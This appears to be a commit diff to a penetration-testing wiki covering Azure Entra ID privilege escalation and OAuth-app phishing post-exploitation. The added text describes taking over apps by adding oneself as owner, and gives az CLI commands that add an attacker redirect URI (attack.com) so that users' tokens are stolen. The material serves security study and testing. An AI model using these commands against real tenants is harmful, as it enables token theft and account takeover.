GITBOOK-719: No subject

HackTricks-wiki · Dec 1, 2024 · 713e9eb · 713e9eb
1 parent a460dee
commit 713e9eb
Show file tree

Hide file tree

Showing 2 changed files with 27 additions and 3 deletions.
diff --git a/...sting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md b/...sting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md
@@ -89,8 +89,7 @@ az ad app credential reset --id <appId> --append
 
 ### `microsoft.directory/applications/owners/update`
 
-**Description**: Update owners of applications\
-**Abuse Potential**: By adding themselves as an owner, an attacker can manipulate the application, including credentials and permissions.
+By adding themselves as an owner, an attacker can manipulate the application, including credentials and permissions.
 
 ```bash
 az ad app owner add --id <AppId> --owner-object-id <UserId>
@@ -100,6 +99,21 @@ az ad app credential reset --id <appId> --append
 az ad app owner list --id <appId>
 ```
 
+### `microsoft.directory/applications/allProperties/update`
+
+An attacker can add a redirect URI to applications that are being used by users of the tenant and then share with them login URLs that use the new redirect URL in order to steal their tokens. Note that if the user was already logged in the application, the authentication is going to be automatic without the user needing to accept anything.
+
+Note that it's also possible to change the permissions the application requests in order to get more permissions, but in this case the user will need accept again the prompt asking for all the permissions.
+
+{% code overflow="wrap" %}
+```bash
+# Get current redirect uris
+az ad app show --id ea693289-78f3-40c6-b775-feabd8bef32f --query "web.redirectUris"
+# Add a new redirect URI (make sure to keep the configured ones)
+az ad app update --id <app-id> --web-redirect-uris "https://original.com/callback https://attack.com/callback" 
+```
+{% endcode %}
+
 ## Service Principals
 
 ### `microsoft.directory/servicePrincipals/credentials/update`

diff --git a/...re-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.md b/...re-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.md
@@ -152,7 +152,17 @@ curl -X GET \
 
 ## Post-Exploitation
 
-Once you got access to the user you can do things such as stealing sensitive documents and even uploading backdoored document files.
+### Phishing Post-Exploitation
+
+Depending on the requested permissions you might be able to **access different data of the tenant** (list users, groups... or even modify settings) and **information of the user** (files, notes, emails...). Then, you can use this permissions to perform those actions.
+
+### Application Post Exploitation
+
+Check the Applications and Service Principal sections of the page:
+
+{% content-ref url="../az-privilege-escalation/az-entraid-privesc/" %}
+[az-entraid-privesc](../az-privilege-escalation/az-entraid-privesc/)
+{% endcontent-ref %}
 
 ## References